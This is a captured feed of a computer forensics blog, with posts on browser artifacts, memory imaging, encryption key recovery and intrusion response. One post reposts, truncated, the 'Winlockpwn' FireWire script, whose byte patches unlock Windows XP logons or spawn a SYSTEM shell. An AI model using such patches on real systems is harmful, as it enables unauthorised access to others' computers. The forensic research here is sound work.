Subscribe: Computer Forensics and Incident Response
Added By: Feedage Forager Feedage Grade B rated
Language: English
access  box  computer  data  file  files  good  history  memory  password  people  someone  system  time  tool  windows  work 
Rate this Feed
Rate this feedRate this feedRate this feedRate this feedRate this feed
Rate this feed 1 starRate this feed 2 starRate this feed 3 starRate this feed 4 starRate this feed 5 star

Comments (0)

Feed Details and Statistics Feed Statistics
Preview: Computer Forensics and Incident Response

Computer Forensics and Incident Response

Updated: 2018-03-05T16:59:08.813+00:00


Unpack Javascript


I haven't mentioned my disdain for all things Java. There it is.

Tool to list windows protected files


Not tested, but interesting nevertheless: SFCList by Nagareshwar Talekar

From his blog post: After I wrote about ‘Detecting System DLL’ some of my friends working on malware analysis asked for any tool which can show if the particular file is protected by SFC mechanism. I could not find any such tool and decided to write my own tool. . .



I was doing a vanity search today on this page and found that my post "Defeating" whole disk encryption was cited in:

Christopher Hargreaves, Howard Chivers, "Recovery of Encryption Keys from Memory Using a Linear Scan," ares,pp.1369-1376, 2008 Third International Conference on Availability, Reliability and Security, 2008

I haven't read the article, but the abstract sounds enticing:

As encrypted containers are encountered more frequently the need for live imaging is likely to increase. However, an acquired live image of an open encrypted file system cannot later be verified against any original evidence, since when the power is removed the decrypted contents are no longer accessible. This paper shows that if a memory image is also obtained at the same time as the live container image, by the design of on-the-fly encryption, decryption keys can be recovered from the memory dump. These keys can then be used offline to gain access to the encrypted container file, facilitating standard, repeatable, forensic file system analysis. The recovery method uses a linear scan of memory to generate trial keys from all possible memory positions to decrypt the container. The effectiveness of this approach is demonstrated by recovering TrueCrypt decryption keys from a memory dump of a Windows XP system.

Academic respectability. Woot!

Tubes Clogged, Internets are Broken


The Internets are broken!

Set your system date to August 2004 before visiting the site.


More here and here.

Alexander Sotirov et. al. did some really interesting research on creating a fake CA using 300 playstations - Fear!

More fun with Chrome


The Sunbelt Blog has a link here that will force Chrome to crash.

Or you can enter crash:% into your browser and do it yourself.

Good times.

Google's Chrome Browsing History, a first pass


This will be a short post. I'm sleep deprived and traveling. . .

Google Chrome debuted yesterday. So sometime this week, someone somewhere will have to do some analysis on Chrome's browser artifacts. Until someone writes a script/program to extract user history, here's one way to get some information:

Chrome saves its data files in C:\Documents and Settings\[user]\Local Settings\Application Data\Google\Chrome\User Data\Default

The following files store data in SQLite format 3:
Archived History
Web Data

To examine those data archived in SQLite format 3, you can run strings against the files. I found sqlite3explorer here. This does a fairly decent job of rendering the data.*

IF we open the "history" file and go to main > tables > urls and right click on


urls, we can click "show data" and the bottom right windows will populate with the data in the urls colunm.

It is important to note that Chrome will import browsing history from other web browsers, so the history contained here may not have been generated by Chrome.

Running Strings against the following files will/may reveal interesting data:
Last Session
Current Session

Visited Links has binary data. YMMV.

* This doesn't work well on my computer unless executed by double clicking on the icon from the firefox download tab:


There are also files called:
History Index 2008-09
History Index 2008-08
(It appears that these are created daily, but this needs to be confirmed)

Pre-boot authentication bypass techniques.


Jonathan Brousard gave a talk at DefCon 16 that has not gotten much press, but his research has some interesting forensic implications. You can read the white paper at

There's a tool set available from the same site.

/dev/mem for Windows, and other bits of memory goodness.


Can "good old cgywin dd" and dcfldd access \.\\Device\PhysicalMemory? It appears that they can.

I was reading posts by Harlan Carvey and Andreas Schuster about new tools for imaging the Physical Memory in Windows this week. Some interesting stuff there. Then I stumbled across an article in Forensic Magazine by Kevin Mandia and Kris Harms, which said in part that \device\PhysicalMemory could be imaged with DCFLDD. I tried the string in the article:
DCFLDD if=\\.\PhysicalMemory of=AnyExternalDevice conv=sync,noerror and I got a big handful of fail for my efforts.

I assumed that someone else had tried this and a little googling turned up this string at forensic focus, as well as a post by on with Windows Incident Response blog that mentioned it (how did I miss that post and why can't I find it now?).

I used the /dev/mem substitution for dcfldd on an XP SP2 box and it seemed to work.

So what I'd learned so far:

1. The Mandia article has incorrect syntax.
2. You can use dcfldd to image something from /dev/mem.

It didn't seem like anyone had figured out what dcfldd was imaging though.

My next thought was, "If dcfldd can image the mysterious /dev/mem, could good old cygwin can access it?" It appears that it can.

According to these posts on the cgywin developer's list, the cygwin grabs \device\PhysicalMemory using cygwin's /dev/mem, in a manner consistent with *nix systems.

I decided to conduct a quick experiment on each. I acquired a sample of physical memory from a XP pro SP2 box:

06/20/2008 09:21 AM 1,064,648,704 dd.img
06/20/2008 09:17 AM 1,064,685,568 win32.dump
06/27/2008 11:49 AM 1,064,685,568 mdd.img
06/20/2008 09:09 AM 1,064,697,856 dcfldd.img

The same command was used for both dcfldd and dd ((DCFL)DD if=/dev/mem of=.\outfile.img conv=sync,noerror

Nothing earth shattering here, but note the file sizes.

P2P Marshall


While researching something unrelated, I tripped across P2P Marshal. Since I have not been able to get to any sort of training short of paying my own way, I did not make it to the DFRWS07 - at any rate, the tool's been out and it's free to LE.

From the website:

P2P Marshal is a tool to analyze peer-to-peer (P2P) usage on file system images. It automatically detects what P2P client programs are, or were, present, extracts configuration and log information, and shows the investigator the shared (uploaded and downloaded) files.

P2P Marshal follows forensic best practices and maintains a detailed log file of all activities it performs. It is designed to be easily extensible to support new P2P clients and networks. It has extensive search capabilities, produces reports in RTF, PDF, and HTML formats and runs on Windows-based operating systems.

* Analyzes peer-to-peer network usage
* NIJ-sponsored project
* Extensible
* Forensically sound
* Version 1.0 available free to law enforcement
* Provides full analysis for: BitTorrent, LimeWire, uTorrent, and Azereus
* Detects and shows default download locations for Ares, Google Hello, and Kazaa
* Future versions will include additional client support and capabilities


* Microsoft Windows XP or Vista Operating System
* 120M disk space free

I don't think I'll have the time to use this any time soon, but if someone else does, I would be interested to know about it.

There's also a mention in the ForensicsWiki about it.

Note to marketing: If you want to sell to cops. . .


don't use toy handcuffs in your marketing.

Talk about "push-button forensics" marketing.

Not impressive. I'd also note that the vendor claimed to have ~900 phones that it could image, but their website showed a little over 410. Hmmm.

Vista may be vulnerable to a local password bypass via firewire.


Vista vulnerable to firewire hack (via Thoughts of a Technocrat)

I've been to busy to play with these attacks, but it's on my to do list.

Digging Deeper during analysis


This post has been on my mind for some time (I'm cleaning up draft posts), but it does not look like I am going to get to it any time soon. So this is going to be quick and dirty.

I was doing forensic on an intrusion last year and I knew the following:

The computer was compromised and talking to the outside world via DNS.

I had a DD image of the RAM, and dumps of process memory from each of the processes (as well as a lot of other volatile data).

Unfortunately, I did not have any way to know which (or if any) of the processes were the bad guy's, so my process of elimination went like this:

1. Look at the process list.
2. Find associated executables.
3. Look at executable files.

Unfortunately, this server was running a lot of "stuff." So I was still left with a lot of files to look at, but after much work, I found a file that looked weird enough to make me think that it was likely tbe bad process. (Oh, and I should point out that there were no logs and the intrusion (we later determined) was months old.)

So how does one go about figuring out what happened when there's an lack of log data? Well, it turns out that when I analyzed the files by date created, and I find a memory.dmp file.

So I spend a bit of time researching the memory dump file format and I was able to find the file that the attacker used (it caused some nastiness at the time it was executed) which in turn led me to find some other information about the attack in unallocated space.

This was kind of long, but if you aren't looking beyond what you can see (untranslated blog here) in the file system, you are missing a lot of good information.

Black Bag pwnies


I've blogged before about Adam (Metlstorm) Boileau's python script that can be used to extract bios/pgp passwords. This week, he released the script that he designed that allows a Linux box to overwrite the windows log-on password in memory. . . cool stuff if you need physical access to a box. I have not tested this yet, but it looks good. . . Now I know what I'll be playing with at work tomorrow.Preemptive comments: "But you're changing the evidence." "But you're modifying the RAM" "But you've got physical access to the box, you could _______." "But if someone doesn't have XP SP2 you are out of luck." "Nobody's done this on Vista." The code's below because his blog has been slashdotted - Blogger left justifies everything so you are going to have to fix the spacing if you use the code below.#!/usr/bin/python# Windows locked screen remote firewire unlockor# Metlstorm 2k6# Uh, private use only, not for public distro, kthx.import sysimport firewireimport binasciiimport timeVER=1.5VERSTR="Winlockpwn v%s Metlstorm, 2k6. " % VER# Targets are dicts, with some properties, and one or more phases# each phase specifies a signature which can be found at one or more# page offsets. When a signature is found the patch is applied at patchoffset# bytes from the beginning of the signature. targets=[{ "name":"WinXP SP2 Fast User Switching Unlock", "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.", "phase":[{ "sig":"8BD8F7DB1ADBFEC3", "pageoffset":[2905], "patch":"bb01000000eb0990", "patchoffset":0}] }, {"name":"WinXP SP2 Unlock", "notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.", "phase":[{ "sig":"0502000010", "pageoffset":[3696], "patch":"b801000000", "patchoffset":0}] }, {"name":"WinXP SP2 msv1_0.dll technique", "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best allround XPSP2 technique.", "phase":[{ "sig":"8BFF558BEC83EC50A1", "pageoffset":[0x927], "patch":"B001", "patchoffset":0xa5}] }, {"name":"WinXP SP2 utilman cmd spawn", "notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default). Then run this, wait till it's patched a couple of data-phase things, then start narrator. Enjoy a shell. You can use this with the msv1_0.dll technique as well, and log in. Any time you want to get back to your shell, just lock the desktop, and you'll go back to the winlogon winstation where your shell will be waiting.", "phase":[ {"name":"Patch code", "sig":"535689bde8faffffff158810185b898540fbffff39bd40fbffff744e8b8524fb", "pageoffset":[0x39f], "patch":"565383c310899de8faffffff158810185b898540fbffff9090909090", "patchoffset":0x0}, {"name":"Patch data", "sig":"2f0055004d000000d420185b0539185b0000000053006f006600740077006100", "pageoffset":[0x9ac, 0x5ac, 0x3ac], "patch":"63006d0064002e006500780065000000570069006e0053007400610030005c00570069006e006c006f0067006f006e0000", "patchoffset":0x0, "keepgoing":True, } ] } ]start = 0x8000000Lend = 0xffffffffLchunk = 4096 print VERSTRdef printTargets(targets): i = 1 p[...]

Two ways to get around passwords - Windows


Lance Muller has a really good post on ways to log on to a windows box without a password:

I discovered two additional ways to get around passwords when the passwords are either too difficult for rainbow tables or when there is only a LM password and a brute-force attack will take too long. The techniques I am going to describe will not recover the password. It will merely let you login to the system with a specific user account. Getting access to the system using these techniques will not let you access any files that are protected via EFS in Windows XP or Vista since the password is used as part of the encryption/decryption process.

Lance's blog can be found here.

Interesting tool - pdump.exe


Toni at has a new tool that has some interesting functionality, it dumps process memory, but it also saves each allocated memory region to a separate file.

I've played with it a little bit and it seems like it has potential.

You can read the post and download the file here.

Blog, not dead


I have had some personal issues that have been intruding on my blogtime. Namely, I'm moving across the country. A couple of years ago, an agency that I don't work for started recruiting me, their recruiting ploy; going back home and doing the same job. Devious.

Long story short, I got an offer from said agency, told my present employer about the job and my agency offered to transfer me. I accepted.

The end result is I've been spending a lot of time arranging for the move. . .

Now a few random thoughts:

1. I was really saddened that Harlan Carvey decided to do away with the WindowsForensicAnalysis group on Yahoo!. I've thought about re-starting the group, but then I'm not sure that I have the time to do the moderation.

2. I do a lot of work with drives that have been encrypted with Pointsec. I've played around with the idea of breaking the encryption, and have done some initial research into the matter. Is there anyone out there who has looked into this, or is interested in collaboration? If you have/are, email me at bill (random gunk here @ .. wsxcvhuio) r i n g 3 . n e t.

3. The US. Gov's idea of of having 50 points that connect to the internet is a good concept, but I'm close to reaching the conclusion that the defense of USG's national assets is best left to the Department of Defense (they're the only ones who seem to do an even half-assed job of protecting their infrastructure). Further, do we really want 50 points that are FOIA'able for all to know about? Do Americans really want everyone to know that the FBI/NSA/CIA is crawling their site? There are some who argue that this is not necessarily going to be the effect of this memo, but remember, bureaucrats will strictly "the letter of the law." The upside is, of course, that if this is properly implemented, the Gov's security will be better. I'm skeptical that this will be the case, however.

4. A holiday spent away from your family is not a good holiday.

Comment spam =+ moderation


It has been a busy couple of months... more to come soon.

In keeping with the Internet security theme


This was originally posted at It's a really good graphic presentation on Web-application problems.


(object) (embed)

The final solution


Internet Security:


With apologies to

A couple of toughts and things to come


1. If you have not seen the Tactical Exploitation presentation by HD Moore and Valsmith did at Defcon this year, you need to see it.

There's good stuff there for forensic folks too. Things like that some people don't know about. . . just good stuff.


2. When you do forensics on compromised systems, there is an inverse relationship between time and evidence; that is, the greater the time between compromise and examination, the evidence decreases.

A couple of files that I've found to be useful in exams - memory.dmp and drwatson.log (it might be drwtsn.log. . .). I'm going to do a do a longer post on this later on, but in short, attacker's tools often cause applications to crash. This is an easy way to find out how the attack was accomplished. WinDbg is your friend here. More later.

3. I'll be posting a couple of scripts in the near future. One will extract event logs from a remote computer, and the other gets services from a remote computer (similar to sc \\remote query), but it also extracts the PID and the path to the executable and command line.

I've been *really* busy in the last couple of months, between work and home life, but I'll continue to post when I've got something that I think is useful.

Things that pain me


It's been a really busy couple of months, so I haven't had much time to myself, but a couple of quick thoughts:1. 5 Minutes a week isn't asking that much, is it?I have a server that I manage - I've been putting in extra hours at work, but still somehow I manage to have 5 minutes a week to look at my logs. I wrote a shell script that looks for things like failed logins, brute force attacks, successful logins, etcetera; why can't IT "Professionals" spend a little time doing the same thing?I'd challenge everyone to stop right here and take a look at the logs on the box that you are viewing this post from, or even better, a server that you manage - you'll learn more from five minutes of reading your own logs than you will from the rest of this blog.2. Information security/assurance/warfare/technology/badgers are stupid Until artificial intelligence (AI) gets significantly better (read, not during the course of your career), there will be no substitute for people doing work to analyze the products that computers create. There is, and there will be no appliance, no snort box, no grep expression, no program, no pretty graphic user interface that will be able to analyze data collected and conclude with a reasonable degree of certainty that something is amiss. People on the other hand can infer and from those infrences determine the likely answer to questions. Attackers are people, and as such are remarkably fluid and resilient in the face of adversity; that is, they can modify their behavior when confronted with new information or situations. Computers by contrast, are rule based - if text == Attack! then drop packet - but if text == 0x41ttack, well. . .This is not to say that computers do not do some things better than people. Data can be sorted and noise eliminated more quickly with them but people have to analyze the data. It's a waste of time to have IDS analysts unless you have an IDS, and it is a waste of time to have a IDS without an analyst.3. Network engineers should consider layer 8 during design, and plan their security accordingly.People are distracted, stupid, ignorant or indifferent to policy. Policy can prohibit me from visiting, but someone won't get the word, or won't care if they do. Policy without enforcement is a waste of time.The only way to secure a network is to build in security as the primary consideration. Some people have come to view their ability to access the Internet as some inalienable right on par with the 4th Amendment to the Constitution* - and IT workers seem to have become both the customer service representatives for said access. It's a sad state of affairs. If your network policy is not governed by a deny all, permit by exception principle, you are owned. Maybe not today, but you will be owned. If you have a DAPBE rule set in place for your network environment, you'll still get owned, but it will be easier to clean up.People don't need to have access to webmail, CNN, ESPN, Homestarrunner or XKCD from work. They want it, sure, and maybe some do need CNN, but who can tell me of a blacklist that will prevent users from going to all of say, the malware sites that are hosted by blogger? I'm guessing that there isn't one.3. When you say, "We need to educate the users." I want you to stop breathing my air.User education is valuable, but only when it's actually education. Education is not the bi-annual, "click here to click through" our security training. You are wasting your money (ok, granted, t[...]

Order on contents of RAM upheld


I previously wrote about a California Magistrate's decision that the contents of RAM are discoverable. It seems that the order withstood appeal to the District Court. The full decision is here.


I am the CEO of Fantasy Land


There's been a dearth of posts of late due to the latest addition to the household - the 9 pound, 10 ounce kind that is. . .Between Kid V.2.0 and l337 h4x04s, I haven't had much time to post, but rynhere breezed by with a few comments. I've edited them for brevity's sake, but since he keeps coming back for the answer, I figured I'd turn this into a post (being the CEO of Fantasy Land does have it's privileges). rynhere: "why would anyone. . . [grab a password from memory] from a running and logged in computer?" Bill: Well, I thought it was kind of obvious, but I've found it useful to have passwords ;-).rynhere: Um, I'm sorry but [PGP ensures] that lost laptops (which are presumably turned off) do not pose a threat as the data is encrypted. Bill: I agree that PGP does mitigate the risk of data loss, but that was not the point.rynhere: Is this "defeat" intended to describe how you would take a turned off laptop and defeat the password? Bill: No.rynhere: I didn't see any mention of it beyond the obvious of brute force...good luck on that. Bill: Actually, there are several products out there that will do just that Accessdata's PRTK and DNA come to mind.rynhere: However, if you have a running computer that has been logged in and is in the windows interface, then let me give you the 1 step method of getting a copy of the data to run forensics against all day long. It's called hooking up a USB drive and downloading the meaningful contents of the native drive.Bill: Leet!rynhere: If your trying to obtain forensic information from the box however, as this article seems to illustrate; I'd like to understand how it is that you ask, (in your kindest, big-brother-is-watching sort of way) for this person to log into WDE and the network for you so that you can take their computer for the next 30 minutes to reverse engineer this password. Riiiight. Tell you what, if you can get someone to give you a logged in and running computer, then one of two things is the case,1. Your the CEO of fantasy land.2. Your in the wrong profession because you can clearly sell water to a drowning man. Go find your calling in life as a salesperson instead of geeking out on reverse engineering passwords to a running, unencrypted (once you've authenticated to WDE, the drive "appears" as unencrypted) box.Ok, now to the point. If you are going to image memory over the network, there's a number of ways get the memory. If you have administrative rights on the box, you can use psexec to get a command prompt on the target's computer, then "net use" back to the drive under your control to execute the tools working as the administrator on your target's box. There is no "pretty" way to do a live acquisition, you are going to make some changes no matter what method you choose, but it's nice to have more than one tool in your toolbox.Oh, and I have asked for and received a number of passwords to computers and I didn't even need to give the users chocolate to get them. You just never know until you ask. . .That's all your CEO has time for right now. . .[...]

You just got 0wned. Now what?


Imagine that you are arriving at your office and you look through the window. Inside the building you can see someone burglarizing the building. What would you do?

You have a few options, you could (1) call the police; (2) you could ignore the burglary and go get a cafe' latte double mocha espresso and hope that the burglar leaves before anyone sees him; (3) or you could open the door to the office, and shout, "Hey! Get out!", wait for the burglar to leave.

In the real world, people routinely choose the first option. They do not run the burglar out of the house and then lock the door to preserve the scene before the police arrive, but for some reason, when it comes to cyber-crime, almost everyone chooses the third option. The burglar is long gone by the time the investigation starts. Evidence has been walked over, looked over, deleted and operating systems re-installed.

The "information assurance" community does a lousy job of ensuring that intrusions are handled appropriately. In my experience there is a community wide knee jerk reaction to intrusions that starts with looking at logs (rather than preserving them), moves into damage control (patching and re-instllation) and then, as an afterthought, calling in people who are qualified to respond to the incident. Harlan Carvey wrote recently that he had only conducted two live acquisitions for clients, and both of those were after operating systems were reinstalled, so I assume that my experience is not unique.

This is usually a response based on emotion, not logic. I know that I'm largely preaching to the choir here, but hopefully someone will wander in during this sermon - so here's what you need to do if you have been hacked:

1. Don't panic

2. Call someone qualified to investigate the incident.

3. Let the investigators investigate, image, analyze what's happen(ing/ed).

4. Develop a plan that will allow you to mitigate damage, determine the extent of the intrusion, catch the bad guy with your incident responders/law enforcement.

5. Implement the plan.